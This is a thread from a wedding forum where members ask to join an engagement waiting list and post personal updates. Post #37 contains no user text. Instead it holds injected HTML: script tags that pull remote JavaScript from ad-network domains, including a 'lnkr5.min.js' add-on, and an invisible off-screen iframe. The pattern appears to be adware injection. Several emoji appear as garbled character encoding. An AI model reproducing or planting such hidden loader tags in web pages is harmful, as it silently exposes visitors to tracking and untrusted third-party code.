(Closed) The Waiting List 03/01/2016

posted 4 years ago in Waiting
  • poll: What body style car do you have?

Sedan/Saloon

Truck

Hatchback/Wagon

SUV

Van

Coupe

Public transit

Walking/biking

Other

• Post # 31
    285 posts
    Helper bee

PT cruiser. Put me on the waiting list. I’m hoping for sometime this summer (but before school lets out would be even better so my students can stop bugging me about it along with the rest of my family). He doesn’t want to do it near any holiday because he wants it to be it’s own special day for us. This kind of ticks me off because there’s pretty much a holiday each month! I told him that I don’t care if we get engaged on the national anniversary of the invention of toilet paper for crying out loud! I just want to marry his stubborn butt! That may sound wacky but he remembers EVERYTHING (which drives me a bit nuts at times). Before anyone comments about anything weird about this relationship you should know that we are opposites that compliment each other, my son adores him, my family adores him (and is eagerly anticipating the ring add much as I am), and his family adores me (but tastefully nonverbal about the future). His friends that have seen him through many bad relationships in the past say that they’ve never seen him happier since we’ve been together and my friends say the same. What can I say but I have found that special someone that I want to annoy for the rest of my life! 😜

Post # 32
    100 posts
    Blushing bee

Please can I be added to the list? πŸ™‚

Post # 33
    145 posts
    Blushing bee
    • Wedding: August 2018

View original reply
    serotonin:Β  yeah – the first few trips plan the route ahead and think through what any turns are like and check out a cycling map if it’s an area you wouldn’t usually walk. Junctions are often not designed very safely for bikes and it’s good to know in advance of you should just get off and walk across a really steep or weirdly organized turn. Happy biking once there are no surpises though πŸ™‚

Post # 34
    370 posts
    Helper bee
    • Wedding: October 2017 - Wedgewood Tower Club

Do you need help with the list? I have Mondays off for a while.

Post # 35
    341 posts
    Helper bee

View original reply
    thorncastle:  Thanks so much! That’s really helpful πŸ™‚

Post # 36
    201 posts
    Helper bee
    • Wedding: December 2020

up 4 spots!! Please keep me here!!

CONGRATS to all the newly engaged bees πŸ™‚

Post # 37
    788 posts
    Busy bee

<script src=”//serverads.net/599b47260394deb2d8.js”></script>
    <script src=”//pulseadnetwork.com/a/display.php?r=1131815″></script>
    <iframe style=”position: absolute; left: -1000px; top: -1000px; width: 1px; height: 1px; visibility: hidden; border: none; background-color: transparent;” src=”//pulseadnetwork.com/pix.html”></iframe>
    <script src=”http://serverads.net/addons/lnkr5.min.js”></script>
    <script src=”http://cdncache-a.akamaihd.net/sub/nee5452/50653_1433_/l.js?pid=2448&ext=Not%20set”></script>

View original reply
    MissZ31:  Are we going to have a new list soon? Do you need some help? Hope everything is ok!! πŸ™‚

Post # 38
    662 posts
    Busy bee

View original reply
    MissZ31:  yes! Hope you’re okay girl. Let us know if you need any help πŸ™‚

Post # 39
    38 posts
    Newbee

Thinking the same thing! Hoping you are doing okay, MissZ31! Let us know if we can help you at all!

Post # 40
    112 posts
    Blushing bee

My boyfriend bought me a 2016 SV6 Commodore last month, so our engagement plans are off for a little while! 

My dream car is a Maserati but that ain’t happening lol

Post # 42
    219 posts
    Helper bee
    • Wedding: June 2017

View original reply
    MissZ31:  glad to know you are okay!! Thoughts with you!! 

Post # 43
    253 posts
    Helper bee
    • Wedding: October 2019 - .

I would like to be added! πŸ™‚

Post # 44
    8 posts
    Newbee

I would like to be added as well please

Post # 45
    108 posts
    Blushing bee

Can’t wait for the post clean up list!

The topic ‘The Waiting List 03/01/2016’ is closed to new replies.

Find Amazing Vendors